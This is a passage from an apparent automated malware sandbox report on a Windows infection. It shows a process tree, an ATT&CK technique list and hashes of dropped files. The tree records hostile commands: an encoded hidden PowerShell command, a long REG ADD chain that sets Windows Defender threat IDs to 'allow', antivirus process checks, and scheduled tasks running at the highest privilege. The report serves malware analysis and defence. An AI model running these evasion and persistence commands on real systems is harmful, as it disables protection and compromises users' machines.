"C:\Users\Admin\Pictures\Adobe Films\lw4HgUE2VHomfhZybqsJpcPN.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4084

C:\Users\Admin\Pictures\Adobe Films\lw4HgUE2VHomfhZybqsJpcPN.exe
"C:\Users\Admin\Pictures\Adobe Films\lw4HgUE2VHomfhZybqsJpcPN.exe" -h
4⤵
- Executes dropped EXE
PID:3252

C:\Users\Admin\Pictures\Adobe Films\7UvYpp5v1PjdPCBVzR9hMEU5.exe
"C:\Users\Admin\Pictures\Adobe Films\7UvYpp5v1PjdPCBVzR9hMEU5.exe"
3⤵
PID:4652

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4652 -s 424
4⤵
- Program crash
PID:2180

C:\Users\Admin\Pictures\Adobe Films\pY2mcXl4cTwjPt93kUE8Pf6n.exe
"C:\Users\Admin\Pictures\Adobe Films\pY2mcXl4cTwjPt93kUE8Pf6n.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3732

C:\Windows\SysWOW64\robocopy.exe
robocopy 8927387376487263745672673846276374982938486273568279384982384972834
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4940

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Provide.accdt & ping -n 5 localhost
4⤵
PID:3444

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:4836

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AvastUI.exe"
6⤵
- Enumerates processes with tasklist
PID:4608

C:\Windows\SysWOW64\find.exe
find /I /N "avastui.exe"
6⤵
PID:1632

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AVGUI.exe"
6⤵
- Enumerates processes with tasklist
PID:4188

C:\Windows\SysWOW64\find.exe
find /I /N "avgui.exe"
6⤵
PID:2472

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^NpDypcc$" Corner.accdt
6⤵
PID:4544

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Quite.exe.pif
Quite.exe.pif r
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2472

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Quite.exe.pif
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Quite.exe.pif
7⤵
- Executes dropped EXE
PID:5880

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
5⤵
- Runs ping.exe
PID:1632

C:\Users\Admin\Pictures\Adobe Films\yv0boMk9qm661CDaxW2QCjxR.exe
"C:\Users\Admin\Pictures\Adobe Films\yv0boMk9qm661CDaxW2QCjxR.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: GetForegroundWindowSpam
PID:8

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 452
4⤵
- Program crash
PID:3976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 764
4⤵
- Program crash
PID:3064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 772
4⤵
- Program crash
PID:1076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 836
4⤵
- Program crash
PID:2628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 844
4⤵
- Program crash
PID:720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 984
4⤵
- Program crash
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 1016
4⤵
- Executes dropped EXE
- Program crash
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 1332
4⤵
- Program crash
PID:3500

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\Bc2FKDk00fNLCotFP9mNuhFTl\Cleaner.exe"
4⤵
PID:4664

C:\Users\Admin\AppData\Local\Temp\Bc2FKDk00fNLCotFP9mNuhFTl\Cleaner.exe
"C:\Users\Admin\AppData\Local\Temp\Bc2FKDk00fNLCotFP9mNuhFTl\Cleaner.exe"
5⤵
- Executes dropped EXE
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 1332
4⤵
- Program crash
PID:5748

C:\Users\Admin\Pictures\Adobe Films\ShoibKSKqd2CZrfAjbtNGyiK.exe
"C:\Users\Admin\Pictures\Adobe Films\ShoibKSKqd2CZrfAjbtNGyiK.exe"
3⤵
- Executes dropped EXE
PID:4224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
4⤵
PID:4664

C:\Users\Admin\Pictures\Adobe Films\VLxhOe2ZaQSVLOWkXp1aonVr.exe
"C:\Users\Admin\Pictures\Adobe Films\VLxhOe2ZaQSVLOWkXp1aonVr.exe"
3⤵
- Executes dropped EXE
PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 252
4⤵
- Program crash
PID:5108

C:\Users\Admin\Pictures\Adobe Films\LDSbuQRihOeKtKJpQqnWTvQf.exe
"C:\Users\Admin\Pictures\Adobe Films\LDSbuQRihOeKtKJpQqnWTvQf.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1852

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\8EUiNQ.cPl",
4⤵
PID:3892

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\8EUiNQ.cPl",
5⤵
- Loads dropped DLL
PID:2640

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\8EUiNQ.cPl",
6⤵
PID:2296

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\8EUiNQ.cPl",
7⤵
- Loads dropped DLL
PID:232

C:\Users\Admin\Pictures\Adobe Films\MQTpTD4UMUpqKOnazuXqlAv0.exe
"C:\Users\Admin\Pictures\Adobe Films\MQTpTD4UMUpqKOnazuXqlAv0.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2548

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin 83498293849hdjfh823u4
4⤵
PID:4016

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Leaves.png & ping -n 5 localhost
4⤵
PID:5068

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:4164

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AvastUI.exe"
6⤵
- Enumerates processes with tasklist
PID:4392

C:\Windows\SysWOW64\find.exe
find /I /N "avastui.exe"
6⤵
PID:2524

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AVGUI.exe"
6⤵
- Enumerates processes with tasklist
PID:3876

C:\Windows\SysWOW64\find.exe
find /I /N "avgui.exe"
6⤵
PID:3080

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^IKRjYJJXSpwiF$" Nhl.png
6⤵
PID:4012

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Comparisons.exe.pif
Comparisons.exe.pif E
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3780

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Comparisons.exe.pif
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Comparisons.exe.pif Films\MQTpTD4UMUpqKOnazuXqlAv0.exe"
7⤵
- Executes dropped EXE
PID:5820

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
6⤵
- Runs ping.exe
PID:4592

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
5⤵
- Runs ping.exe
PID:5488

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
2⤵
- Creates scheduled task(s)
PID:508

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
2⤵
- Creates scheduled task(s)
PID:2040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4472 -ip 4472
1⤵
PID:5008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 8 -ip 8
1⤵
PID:2824

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 464 -p 4652 -ip 4652
1⤵
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 8 -ip 8
1⤵
PID:1492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 8 -ip 8
1⤵
PID:4092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 8 -ip 8
1⤵
PID:2652

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:3244

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
PID:4196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 600
3⤵
- Program crash
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4196 -ip 4196
1⤵
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 8 -ip 8
1⤵
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 8 -ip 8
1⤵
PID:3636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 8 -ip 8
1⤵
PID:404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2956 -ip 2956
1⤵
PID:544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2180 -ip 2180
1⤵
PID:4736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3504

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1188

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 8 -ip 8
1⤵
PID:4804

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\ProgramData\pvfq\wbnqvrh.exe
C:\ProgramData\pvfq\wbnqvrh.exe start2
1⤵
- Executes dropped EXE
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 484
2⤵
- Program crash
PID:5196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5288

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5452

C:\Users\Admin\AppData\Local\Temp\b3f32abb88\rovwer.exe
C:\Users\Admin\AppData\Local\Temp\b3f32abb88\rovwer.exe
1⤵
- Executes dropped EXE
PID:5548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 312
2⤵
- Program crash
PID:5896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 8 -ip 8
1⤵
PID:5728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5548 -ip 5548
1⤵
PID:5868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2404 -ip 2404
1⤵
PID:6116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3188 -ip 3188
1⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\umJBJNs.exe
C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\umJBJNs.exe Qf /site_id 525403 /S
1⤵
- Executes dropped EXE
PID:4032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Modifies data under HKEY_USERS
PID:4768

C:\ProgramData\pvfq\wbnqvrh.exe
C:\ProgramData\pvfq\wbnqvrh.exe start2
1⤵
- Executes dropped EXE
PID:1436

C:\Users\Admin\AppData\Local\Temp\b3f32abb88\rovwer.exe
C:\Users\Admin\AppData\Local\Temp\b3f32abb88\rovwer.exe
1⤵
- Executes dropped EXE
PID:5352

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adblock.lnk
Filesize
1KB

MD5
df983765f5f0f630058625f5f47cd1a2

SHA1
23acf4824d5a026a13feadeaa95c6497d73f7e0b

SHA256
9c98910649507a09245381ee94e960895adc426ada34b97889d96a7d79c9ce60

SHA512
46cc0a65f055ec2d06c9cc0064a563b4348212d381e854a37b3857e4225c97ac3f14dae8971367bd714d74bdc996296eb7e55254b52338316f81d52c11bd999b

Download Submit
C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll
Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4779.tmp\Install.exe
Filesize
6.4MB

MD5
6f29d81c69ef0c5ee7c562c0ded3ec06

SHA1
14fdda676521647b018a9ea546d3ecb71f33a187

SHA256
5fc70573438ef681fb66ef80c177ed233aca0b730a843cf64418b922d81ad399

SHA512
0a7dbf12064b0216434d4fe12abc1dd58a159110429399c33d3d031d223bb0f4af043e6b0645bccbe3098a5aec2d91a46cb61dc261943126b5926e67985a9e37

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4779.tmp\Install.exe
Filesize
6.4MB

MD5
6f29d81c69ef0c5ee7c562c0ded3ec06

SHA1
14fdda676521647b018a9ea546d3ecb71f33a187

SHA256
5fc70573438ef681fb66ef80c177ed233aca0b730a843cf64418b922d81ad399

SHA512
0a7dbf12064b0216434d4fe12abc1dd58a159110429399c33d3d031d223bb0f4af043e6b0645bccbe3098a5aec2d91a46cb61dc261943126b5926e67985a9e37

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6736.tmp\Install.exe
Filesize
7.0MB

MD5
f97416d14073c98a7bc58eaac2321c0f

SHA1
785c538f256d59bf6a986d04f9e1b2ffc9665ad7

SHA256
bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1

SHA512
a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6736.tmp\Install.exe
Filesize
7.0MB

MD5
f97416d14073c98a7bc58eaac2321c0f

SHA1
785c538f256d59bf6a986d04f9e1b2ffc9665ad7

SHA256
bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1

SHA512
a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066

Download Submit
C:\Users\Admin\AppData\Local\Temp\8EUiNQ.cPl
Filesize
1.7MB

MD5
3bb5081487d975b667b441e50539316a

SHA1
64bc5a07a41c24f539043e444c086e821dc7e08a

SHA256
5f83974a32efe4bce31646e4367060a016d5e7e06abfb5808c3ef1c06360eb86

SHA512
552140ffd2d4b4262135773dababd98ca8425d52e06fbb97b23dcb6dcc7ffca3dcd1ee4ab0f862437b8b26a1300f2271fe7ed638df8f59c163088d24331e6e30

Download Submit
C:\Users\Admin\AppData\Local\Temp\8EuiNq.cpl
Filesize
1.7MB

MD5
3bb5081487d975b667b441e50539316a

SHA1
64bc5a07a41c24f539043e444c086e821dc7e08a

SHA256
5f83974a32efe4bce31646e4367060a016d5e7e06abfb5808c3ef1c06360eb86

SHA512
552140ffd2d4b4262135773dababd98ca8425d52e06fbb97b23dcb6dcc7ffca3dcd1ee4ab0f862437b8b26a1300f2271fe7ed638df8f59c163088d24331e6e30

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Leaves.png
Filesize
12KB

MD5
f25e71fa12389a12b0e4c4f046fa02ee

SHA1
929541a980ea151571d7e2c2e782caacd962c566

SHA256
1b30ca2b38147f7fe72a17492f6079c8425443fdcc28a49033465cc8936644b2

SHA512
5db04cb2e518e6590650b114f2a4b4f705c54d53f5d363b822037c8e461638f970216479d1b8d429f2d7e235f4010a7deeb86decf073491ffc847400e8ba04fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dat
Filesize
557KB

MD5
1c450be9cd7d955eb860c73c074fbfa7

SHA1
201902a3ee2818f00a473bcc04b678579b934b6c

SHA256
7ab346201ac38cc4d787ad55f12fbb457ed64f187304e4e2b076c4fa0d64eb74

SHA512
84cafad2c42e018a1241719d1085b61ea093ec90ac2dca18f1fb9ff93e618d1ee64135732deb990de88c91e820603f973a97062f150871a2d4b6d2115380dab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
e2082e7d7eeb4a3d599472a33cbaca24

SHA1
add8cf241e8fa6ec1e18317a7f3972e900dd9ab7

SHA256
9e02e104e1ab52a1c33d650c34d05a641c53e8edd5471c7ee4f68f29c79d62c1

SHA512
ae880716e0a2db43797a55294e101ad92323a0f08443c0337c4abe4d049375821b04b08744889c992b2a01396e89702585e9a3688e6c795e208e3dd594a99e07

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
e2082e7d7eeb4a3d599472a33cbaca24

SHA1
add8cf241e8fa6ec1e18317a7f3972e900dd9ab7

SHA256
9e02e104e1ab52a1c33d650c34d05a641c53e8edd5471c7ee4f68f29c79d62c1

SHA512
ae880716e0a2db43797a55294e101ad92323a0f08443c0337c4abe4d049375821b04b08744889c992b2a01396e89702585e9a3688e6c795e208e3dd594a99e07

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-1A9MS.tmp\PEInjector.dll
Filesize
186KB

MD5
a4cf124b21795dfd382c12422fd901ca

SHA1
7e2832f3b8b8e06ae594558d81416e96a81d3898

SHA256
9e371a745ea2c92c4ba996772557f4a66545ed5186d02bb2e73e20dc79906ec7

SHA512
3ee82d438e4a01d543791a6a17d78e148a68796e5f57d7354da36da0755369091089466e57ee9b786e7e0305a4321c281e03aeb24f6eb4dd07e7408eb3763cdd

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-6S2PC.tmp\D5rdmmEor9e88AqOP7wSSW07.tmp
Filesize
3.0MB

MD5
64f68f0b5364a0313ef5c2ede5feac47

SHA1
00ad3dab6e7906ba79ba23ee43809430ed7901b4

SHA256
25c367da28a2e61834bbaeed1a594a0ca1e377a8c27215c9ad6ac5d97f671b8b

SHA512
75586a619f9dc618652d62849c7de840faf83378adbb78572a342807b2749628fd0baaea79e16124cac5f82aa49bc9f77274af039cd7d52885cc655235658de1

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-6S2PC.tmp\D5rdmmEor9e88AqOP7wSSW07.tmp
Filesize
3.0MB

MD5
64f68f0b5364a0313ef5c2ede5feac47

SHA1
00ad3dab6e7906ba79ba23ee43809430ed7901b4

SHA256
25c367da28a2e61834bbaeed1a594a0ca1e377a8c27215c9ad6ac5d97f671b8b

SHA512
75586a619f9dc618652d62849c7de840faf83378adbb78572a342807b2749628fd0baaea79e16124cac5f82aa49bc9f77274af039cd7d52885cc655235658de1

Download Submit
C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\settings.dat
Filesize
40B

MD5
0901600207ccc0986ba78ff9a7734258

SHA1
b5ed1878c58ebe6d6ab4f9dfeae971fe653892ba

SHA256
c65112b899ec6063b2f6dfede56cbb66007772c7490feb452bd4fe2be25df3fc

SHA512
5988a29813c42c04a3e8ce2085a6959621b2652fc2e27d54a86cfa61f1057c565702f4683fa821161f7a592f496112ac466cf503290ce132bcd09f1e613d77be

Download Submit
C:\Users\Admin\Documents\pWj0tbKPBIqzl8cWzJJduyGL.exe
Filesize
351KB

MD5
312ad3b67a1f3a75637ea9297df1cedb

SHA1
7d922b102a52241d28f1451d3542db12b0265b75

SHA256
3b4c1d0a112668872c1d4f9c9d76087a2afe7a8281a6cb6b972c95fb2f4eb28e

SHA512
848db7d47dc37a9025e3df0dda4fbf1c84d9a9191febae38621d9c9b09342a987ff0587108cccfd874cb900c88c5f9f9ca0548f3027f6515ed85c92fd26f8515

Download Submit
C:\Users\Admin\Documents\pWj0tbKPBIqzl8cWzJJduyGL.exe
Filesize
351KB

MD5
312ad3b67a1f3a75637ea9297df1cedb

SHA1
7d922b102a52241d28f1451d3542db12b0265b75

SHA256
3b4c1d0a112668872c1d4f9c9d76087a2afe7a8281a6cb6b972c95fb2f4eb28e

SHA512
848db7d47dc37a9025e3df0dda4fbf1c84d9a9191febae38621d9c9b09342a987ff0587108cccfd874cb900c88c5f9f9ca0548f3027f6515ed85c92fd26f8515

Download Submit
C:\Users\Admin\Pictures\Adobe Films\0a2MjfgeUg1OpH55ydagt_Xk.exe
Filesize
296KB

MD5
8565ffd9927d710197ffc41000835124

SHA1
7c908987eca2c76ee44cca8f3730c3e3936e0d0c

SHA256
a2f6d565d70e1c41bcfdd6c763f237dda3252d2c207012f77f58d3c5dc6a5a4a

SHA512
62d94d2d06c53006826e6a7574ab62f5c4cf8c84a96f00474fc2b184368f1e4f7b4027236d8325c615f508734bfc8d52f690f6ea9bc17375726489260d69a5f5

Download Submit
C:\Users\Admin\Pictures\Adobe Films\0a2MjfgeUg1OpH55ydagt_Xk.exe
Filesize
296KB

MD5
8565ffd9927d710197ffc41000835124

SHA1
7c908987eca2c76ee44cca8f3730c3e3936e0d0c

SHA256
a2f6d565d70e1c41bcfdd6c763f237dda3252d2c207012f77f58d3c5dc6a5a4a

SHA512
62d94d2d06c53006826e6a7574ab62f5c4cf8c84a96f00474fc2b184368f1e4f7b4027236d8325c615f508734bfc8d52f690f6ea9bc17375726489260d69a5f5

Download Submit
C:\Users\Admin\Pictures\Adobe Films\1xOiJqj_MxGvI6EvRdq5Rfgc.exe
Filesize
7.2MB

MD5
72c3d52c24044eaaa84ef8c584f61f70

